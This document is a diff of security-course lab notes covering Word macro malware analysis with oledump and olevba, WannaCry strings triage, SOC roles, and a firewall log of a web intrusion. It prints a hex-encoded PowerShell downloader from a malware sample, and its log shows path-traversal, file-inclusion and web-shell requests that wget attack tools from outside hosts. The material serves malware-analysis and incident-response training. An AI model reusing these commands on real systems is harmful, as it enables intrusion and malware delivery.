628	-	Import-Csv c:\ps\PowerShell-Files\class_nessus.csv \| Get-Member
628	+	NOTE: ask the instructor for the password
629
630
631	-	filter the objects:
631	+
632
633
634	-	Import-Csv c:\ps\PowerShell-Files\class_nessus.csv \| where {$_.risk -eq "high"}
634	+	########################
635		# Linux analysis tasks #
636		########################
637	-	use the Select-Object cmdlet and only get unique entries:
637	+	---------------------------Type this command-----------------------------------
638		file 064016.doc
639	-	Import-Csv c:\ps\PowerShell-Files\class_nessus.csv \| where {$_.risk -eq "high"} \| select host -Unique
639	+
640		hexdump -n 2 -C 064016.doc
641	-	Import-Csv c:\ps\PowerShell-Files\class_nessus.csv \| where {"high","medium","low" -contains $_.risk} \| select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name \| Out-GridView
641	+
642		strings 064016.doc \| grep -i dll
643
644	-	ConvertTo-Html cmdlet and turn it in to an HTML report in list format:
644	+	strings 064016.doc \| grep -i library
645
646	-	Import-Csv c:\ps\PowerShell-Files\class_nessus.csv \| where {"high","medium","low" -contains $_.risk} \| select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name \| ConvertTo-Html -As List > C:\report2.html
646	+	strings 064016.doc \| grep -i reg
647
648		strings 064016.doc \| grep -i key
649
650		strings 064016.doc \| grep -i rsa
651
652	-	#####################################################
652	+	strings 064016.doc \| grep -i open
653	-	# Analyzing Macro Embedded Malware #
653	+
654	-	# Reference: #
654	+	strings 064016.doc \| grep -i get
655	-	# https://jon.glass/analyzes-dridex-malware-p1/ #
655	+
656	-	#####################################################
656	+	strings 064016.doc \| grep -i mutex
657
658	-	Use the InfoSec Addicts virtual machine:
658	+	strings 064016.doc \| grep -i irc
659	-	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
659	+
660	-	user: infosecaddicts
660	+	strings 064016.doc \| grep -i join
661	-	pass: infosecaddicts
661	+
662		strings 064016.doc \| grep -i admin
663
664		strings 064016.doc \| grep -i list
665	-	sudo pip install olefile
665	+
666	-	infosecaddicts
666	+	olevba 064016.doc --decode
667		---------------------------------------------------------------------------------
668	-	mkdir ~/Desktop/oledump
668	+
669
670	-	cd ~/Desktop/oledump
670	+
671
672	-	wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
672	+	See if you find this long string of text:
673		636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
674	-	unzip oledump_V0_0_22.zip
674	+
675		- Take that long blob that starts with 636D and finishes with 653B and paste it in:
676	-	wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
676	+
677
678	-	unzip 064016.zip
678	+
679	-	infected
679	+
680		#########################################
681	-	python oledump.py 064016.doc
681	+	# Security Operations Center Job Roles #
682		# Intrusion Analysis Level 1 #
683	-	python oledump.py 064016.doc -s A4 -v
683	+	#########################################
684		Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
685		Comfortable with basic network (Network+)
686	-	- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
686	+	Comfortable with security fundamentals (Security+)
687	-	- Three of the data streams are flagged as macros: A3:'VBA/Module1′, A4:'VBA/Module2′, A5:'VBA/ThisDocument'.
687	+
688
689
690	-	python oledump.py 064016.doc -s A5 -v
690	+
691
692		Job Task: Process security events, follow incident response triage playbook
693	-	- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
693	+
694		#########################################
695		# Security Operations Center Job Roles #
696	-	python oledump.py 064016.doc -s A3 -v
696	+	# Intrusion Analysis Level 2 #
697		#########################################
698
699	-	- Look for "GVhkjbjv" and you should see:
699	+	Required Technical Skills: Comfortable with basic Linux/Windows system administration
700		Comfortable with basic network administration
701		Comfortable with basic programming
702		Comfortable researching IT security issues
703
704
705
706
707
708		Job Task: Perform detailed malware analysis, assist with development of the incident response triage playbook
709
710		#########################################
711		# Security Operations Center Job Roles #
712	-	############################################
712	+	# Intrusion Analysis Level 3 #
713	-	# Introduction to scripting and toolmaking #
713	+	#########################################
714	-	############################################
714	+
715	-	https://www.youtube.com/watch?v=usiqXcWb978
715	+	Required Technical Skills: Strong statistical analysis background
716		Strong programming background (C, C++, Java, Assembly, scripting languages)
717	-	Start the ISE
717	+	Advanced system/network administration background
718		Comfortable researching IT security issues
719
720	-	CTRL+R
720	+
721
722
723
724		Job Task: Perform detailed malware analysis
725		Perform detailed statistical analysis
726		Assist with development of the incident response triage playbook
727
728
729	-	Get-EventLog -LogName application
729	+
730		-------------------------------------------------------------------------------------------------------------------------
731
732	-	------------------------------------------------------------------------------------------------
732	+	Step 1: Receive suspicious file
733	-	--- Now run the script ---
733	+	-------------------------------
734		- Help Desk tickets
735	-	.\GrabLogs.ps1
735	+	- SIEM
736		- AV
737		- EDR
738	-	------------------------------------------------------------------------------------------------
738	+	- Email/Spam
739		- Proxy
740
741
742	-	$LogName="application"
742	+
743	-	Get-EventLog -LogName $LogName \| Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
743	+	Step 2: Perform static analysis
744		-------------------------------
745		1. Run strings/grep for primary IoCs
746		- Modifies the registry
747		- Modifies processes/services
748	-	--- Now run the script ---
748	+	- Modifies the filesystem
749		- Connects to the network
750	-	.\GrabLogs.ps1
750	+
751		A yes to these should help you determine whether you want to do dynamic analysis or not
752
753	-	------------------------------------------------------------------------------------------------
753	+	Consideration 1: Encryption/Obfuscation - you may have to do dynamic analysis
754
755		Consideration 2: If you dealing with anti-analysis - you may have to do static analysis
756	-	param(
756	+
757	-	$LogName="application"
757	+
758	-	)
758	+
759	-	Get-EventLog -LogName $LogName \| Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
759	+
760
761		Step 3: Determine if the malware modifies the registry
762		------------------------------------------------------
763	-	--- Now run the script ---
763	+
764
765	-	.\GrabLogs.ps1
765	+	---------------------------Type This-----------------------------------
766		strings wannacry.exe \| grep -i reg
767
768	-	------------------------------------------------------------------------------------------------
768	+	strings wannacry.exe \| grep -i hkcu
769	-	--- Now run the script ---
769	+
770		strings wannacry.exe \| grep -i hklm
771	-	.\GrabLogs.ps1 -L[ TAB Key ]
771	+
772		strings wannacry.exe \| grep -i hkcr
773	-	.\GrabLogs.ps1 -LogName (you should now see LogName spelled out)
773	+	-----------------------------------------------------------------------
774
775
776	-	.\GrabLogs.ps1 -LogName system
776	+
777		Step 4: Determine if the malware modifies processes/services
778		------------------------------------------------------------
779	-	------------------------------------------------------------------------------------------------
779	+
780		---------------------------Type This-----------------------------------
781		strings wannacry.exe \| grep -i advapi32
782
783	-	param(
783	+	strings wannacry.exe \| grep -i service
784	-	$LogName="application",
784	+
785	-	$FACTS
785	+	strings wannacry.exe \| grep -i OpenSCManagerA
786	-	)
786	+
787	-	Get-EventLog -LogName $LogName \| Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
787	+	strings wannacry.exe \| grep -i OpenSCManagerA
788
789		strings wannacry.exe \| grep -i InternetCloseHandle
790
791	-	------------------------------------------------------------------------------------------------
791	+	strings wannacry.exe \| grep -i OpenServiceA
792	-	--- Now run the script ---
792	+
793		strings wannacry.exe \| grep -i CloseServiceHandle
794	-	.\GrabLogs.ps1 -H[ TAB Key ]
794	+
795		strings wannacry.exe \| grep -i StartServiceCtrlDispatcherA
796	-	.\GrabLogs.ps1 -FACTS (you should now see FACTS spelled out)
796	+
797		strings wannacry.exe \| grep -i GetExitCodeProcess
798
799		strings wannacry.exe \| grep -i GetProcAddress
800		-----------------------------------------------------------------------
801	-	------------------------------------------------------------------------------------------------
801	+
802	-	--- Now get help on the script ---
802	+
803
804	-	get-help .\GrabLogs.ps1
804	+	Step 4: Determine if the malware modifies the file system
805	-	GrabLogs.ps1 [[-LogName] <Object>] [[-FACTS] <Object>]
805	+	------------------------------------------------------------
806
807		---------------------------Type This-----------------------------------
808		strings wannacry.exe \| grep -i GetTempPathW
809
810	-	------------------------------------------------------------------------------------------------
810	+	strings wannacry.exe \| grep -i GetWindowsDirectoryW
811	-	param(
811	+
812	-	[string]$LogName="application",
812	+	strings wannacry.exe \| grep -i %TEMP%
813	-	$FACTS
813	+
814	-	)
814	+	strings wannacry.exe \| grep -i GetFileAttributesA
815	-	Get-EventLog -LogName $LogName \| Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
815	+	-----------------------------------------------------------------------
816
817
818
819	-	------------------------------------------------------------------------------------------------
819	+
820	-	--- Now get help on the script ---
820	+
821		Step 5: Does the malware have any persistence capability
822	-	get-help .\GrabLogs.ps1
822	+
823	-	GrabLogs.ps1 [[-LogName] <String>] [[-FACTS] <Object>]
823	+	3 main ways for an attacker to maintain access to a compromised system (persistence)
824
825		- Registry
826		- Service
827		- Scheduled task
828	-	------------------------------------------------------------------------------------------------
828	+
829	-	param(
829	+
830	-	[string[]]$LogName="application",
830	+
831	-	$FACTS
831	+
832	-	)
832	+
833	-	Get-EventLog -LogName $LogName \| Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
833	+
834		<189>Nov 11 2006 15:58:48: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/images
835		<189>Nov 11 2006 15:58:49: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/images/
836		<189>Nov 11 2006 15:58:50: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/icons/folder.gif
837	-	------------------------------------------------------------------------------------------------
837	+	<189>Nov 11 2006 15:59:31: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/images/blue/
838	-	--- Now get help on the script ---
838	+	<189>Nov 11 2006 15:59:32: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/icons/image2.gif
839		<189>Nov 11 2006 16:01:01: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/configuration
840	-	get-help .\GrabLogs.ps1
840	+	<189>Nov 11 2006 16:01:07: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/config
841	-	GrabLogs.ps1 [[-LogName] <String[]>] [[-FACTS] <Object>]
841	+	<189>Nov 11 2006 16:01:12: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/config.php
842		<189>Nov 11 2006 16:01:25: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/server_settings.php
843		<189>Nov 11 2006 16:01:53: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/attachments
844		<189>Nov 11 2006 16:02:00: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin
845	-	------------------------------------------------------------------------------------------------
845	+	<189>Nov 11 2006 16:02:09: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php
846	-	[CmdletBinding()]
846	+	<189>Nov 11 2006 16:02:13: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=attachments
847	-	param(
847	+	<189>Nov 11 2006 16:02:16: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=templates
848	-	[Parameter(Mandatory=$True)]
848	+	<189>Nov 11 2006 16:02:31: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=settings
849	-	$LogName
849	+	<189>Nov 11 2006 16:02:38: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=settings../
850	-	)
850	+	<189>Nov 11 2006 16:02:46: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=../settings
851	-	Get-EventLog -LogName $LogName \| Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
851	+	<189>Nov 11 2006 16:03:02: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=../../../../../../etc/passwd
852		<189>Nov 11 2006 16:03:08: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=../../../../../../etc/passwd%00
853		<189>Nov 11 2006 16:03:26: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=topts
854		<189>Nov 11 2006 16:03:30: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=users
855	-	------------------------------------------------------------------------------------------------
855	+	<189>Nov 11 2006 16:03:35: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=theme
856	-	--- Now run the script ---
856	+	<189>Nov 11 2006 16:03:39: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=pager
857		<189>Nov 11 2006 16:03:43: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=kbase
858	-	.\GrabLogs.ps1
858	+	<189>Nov 11 2006 16:03:46: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=attachments
859		<189>Nov 11 2006 16:03:48: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=templates
860		<189>Nov 11 2006 16:03:53: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php? tpl=Please+Select+a+Template+to+Edit+.+.+.&t=templates&restore_tpl=Restore+Templates
861		<189>Nov 11 2006 16:04:57: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common
862		<189>Nov 11 2006 16:04:57: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/
863		<189>Nov 11 2006 16:06:22: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/whosonline.php
864	-	------------------------------------------------------------------------------------------------
864	+	<189>Nov 11 2006 16:10:26: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/logout.php?database=http://cgi.cs.kent.edu/ ~pwang/php/store/images/14.txt%00
865	-	[CmdletBinding()]
865	+	<189>Nov 11 2006 16:10:26: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/index.php
866	-	param(
866	+	<189>Nov 11 2006 16:13:15: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../ etc/passwd%00
867	-	[Parameter(Mandatory=$True)]
867	+	<189>Nov 11 2006 16:15:23: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/admin/control.php?t=attachments
868	-	$LogName
868	+	<189>Nov 11 2006 16:15:55: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp
869	-	)
869	+	<189>Nov 11 2006 16:18:56: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la
870	-	Get-EventLog -LogName $LogName \| Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
870	+	<189>Nov 11 2006 16:20:16: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=uname%20-a
871		<189>Nov 11 2006 16:20:30: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=finger
872		<189>Nov 11 2006 16:20:51: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20la%20../
873		<189>Nov 11 2006 16:21:03: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../
874		<189>Nov 11 2006 16:21:43: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../
875		<189>Nov 11 2006 16:23:00: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../lang
876	-	------------------------------------------------------------------------------------------------
876	+	<189>Nov 11 2006 16:25:34: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=wget%20-O%20../lang/lan.txt.gz%20http://rst.void.ru/download/r57shell.txt.gz
877	-	<#
877	+	<189>Nov 11 2006 16:25:41: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../lang
878		<189>Nov 11 2006 16:25:42: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/favicon.ico
879	-	.Synopsis
879	+	<189>Nov 11 2006 16:25:57: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../lang
880	-	This is a just a short explantion of the script
880	+	<189>Nov 11 2006 16:25:58: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/favicon.ico
881		<189>Nov 11 2006 16:26:11: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../
882	-	.Description
882	+	<189>Nov 11 2006 16:26:41: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20config.php
883	-	This is where provide a more information about how to use the script
883	+	<189>Nov 11 2006 16:27:20: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../wordpress
884		<189>Nov 11 2006 16:27:54: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/wordpress/test.php
885	-	.Parameter LogName
885	+	<189>Nov 11 2006 16:28:16: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/wordpress
886	-	This is where you specify the names of different logs
886	+	<189>Nov 11 2006 16:28:17: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/wordpress/
887		<189>Nov 11 2006 16:28:18: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/wordpress/wp-content/themes/default/style.css
888	-	./Syntax
888	+	<189>Nov 11 2006 16:28:20: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/wordpress/wp-content/themes/default/images/ kubrickheader.jpg
889	-	GrabLogs.psl -LogName security
889	+	<189>Nov 11 2006 16:28:20: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/wordpress/wp-content/themes/default/images/kubrickbg.jpg
890		<189>Nov 11 2006 16:28:20: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/wordpress/wp-content/themes/default/images/ kubrickbgcolor.jpg
891		<189>Nov 11 2006 16:28:20: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/wordpress/wp-content/themes/default/images/ kubrickfooter.jpg
892	-	.Example
892	+	<189>Nov 11 2006 16:28:26: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/wordpress/test.php
893	-	GrabLogs.psl -LogName security
893	+	<189>Nov 11 2006 16:28:27: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/wordpress/test.php?=PHPE9568F34-D428-11d2-A769- 00AA001ACF42
894		<189>Nov 11 2006 16:28:27: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/wordpress/test.php?=PHPE9568F35-D428-11d2-A769- 00AA001ACF42
895		<189>Nov 11 2006 16:29:24: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20../../wordpress/wp-config.php
896	-	#>
896	+	<189>Nov 11 2006 16:30:37: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20../../../
897	-	[CmdletBinding()]
897	+	<189>Nov 11 2006 16:30:49: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../../
898	-	param(
898	+	<189>Nov 11 2006 16:31:08: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/cgi-bin
899	-	[Parameter(Mandatory=$True)]
899	+	<189>Nov 11 2006 16:31:12: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../../cgi-bin
900	-	$LogName
900	+	<189>Nov 11 2006 16:31:20: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../../../
901	-	)
901	+	<189>Nov 11 2006 16:32:08: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../../../account
902	-	Get-EventLog -LogName $LogName \| Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
902	+	<189>Nov 11 2006 16:33:00: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20../../../../etc/passwd
903		<189>Nov 11 2006 16:33:13: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20../../../../../etc/passwd
904		<189>Nov 11 2006 16:34:39: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../../../
905		<189>Nov 11 2006 16:34:45: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=id
906		<189>Nov 11 2006 16:34:53: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../../../root
907	-	------------------------------------------------------------------------------------------------
907	+	<189>Nov 11 2006 16:37:33: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=fing%20/% 20.bash_history
908	-	--- Now get help on the script ---
908	+	<189>Nov 11 2006 16:38:15: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=ps%20-f
909		<189>Nov 11 2006 16:38:37: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=find%20/%20.bash_history
910	-	get-help .\GrabLogs.ps1
910	+	<189>Nov 11 2006 16:39:15: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=find%20.bash_history
911		<189>Nov 11 2006 16:39:25: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=find%20/%20.bash_history
912		<189>Nov 11 2006 16:39:49: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/proc
913		<189>Nov 11 2006 16:40:38: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/etc
914		<189>Nov 11 2006 16:41:06: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20/etc/.pwd.lock
915		<189>Nov 11 2006 16:41:28: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=hostname
916		<189>Nov 11 2006 16:41:34: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=hostname%20-i
917	-	------------------------------------------------------------------------------------------------
917	+	<189>Nov 11 2006 16:41:49: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ifconfig
918	-	--- Now get help on the script ---
918	+	<189>Nov 11 2006 16:42:37: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20passwd.OLD
919	-	get-help .\GrabLogs.ps1 -full
919	+	<189>Nov 11 2006 16:42:48: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20php.ini
920		<189>Nov 11 2006 16:43:02: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20/etc/passwd.OLD
921		<189>Nov 11 2006 16:43:44: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20/etc/php.ini
922		<189>Nov 11 2006 16:44:23: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20/etc/pwdb.conf
923		<189>Nov 11 2006 16:45:37: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20/etc/pwdb.conf
924		<189>Nov 11 2006 16:45:43: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20/etc/shells
925		<189>Nov 11 2006 16:46:08: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/
926		<189>Nov 11 2006 16:46:40: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=finger
927	-	<#
927	+	<189>Nov 11 2006 16:47:30: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20.bash_history
928		<189>Nov 11 2006 16:48:17: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../../../
929	-	.Synopsis
929	+	<189>Nov 11 2006 16:48:37: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=%20pwd%20../../../../
930	-	This is a just a short explantion of the script
930	+	<189>Nov 11 2006 16:48:56: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../../../../
931		<189>Nov 11 2006 16:49:43: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/etc
932	-	.Description
932	+	<189>Nov 11 2006 16:50:13: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/c:eproject2.metadata.pluginsorg.eclipse.wst.server.coretmp0webappsCMECF_OWSWEB-INFattachments
933	-	This is where provide a more information about how to use the script
933	+	<189>Nov 11 2006 16:50:40: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/root
934		<189>Nov 11 2006 16:51:01: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/proc
935	-	.Parameter LogName
935	+	<189>Nov 11 2006 16:52:54: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=netstat%20-a
936	-	This is where you specify the names of different logs
936	+	<189>Nov 11 2006 16:56:17: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ps%20-f
937		<189>Nov 11 2006 16:59:32: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=wget%20-O%20/tmp/11232.tgz%20http://satanic.easycoding.org/release/itx-ng-0.1-rc2.tgz
938	-	./Syntax
938	+	<189>Nov 11 2006 16:59:59: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/
939	-	GrabLogs.psl -LogName security
939	+	<189>Nov 11 2006 17:01:07: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/tmp
940		<189>Nov 11 2006 17:01:37: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cat%20/tmp/mapping-root
941		<189>Nov 11 2006 17:02:25: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
942	-	.Example
942	+	<189>Nov 11 2006 17:03:10: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=mv%20/tmp/11232.tgz%20/tmp/.ICE-unix/11232.tgz
943	-	GrabLogs.psl -LogName security
943	+	<189>Nov 11 2006 17:03:16: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
944		<189>Nov 11 2006 17:03:17: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/favicon.ico
945		<189>Nov 11 2006 17:03:25: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/tmp/
946	-	#>
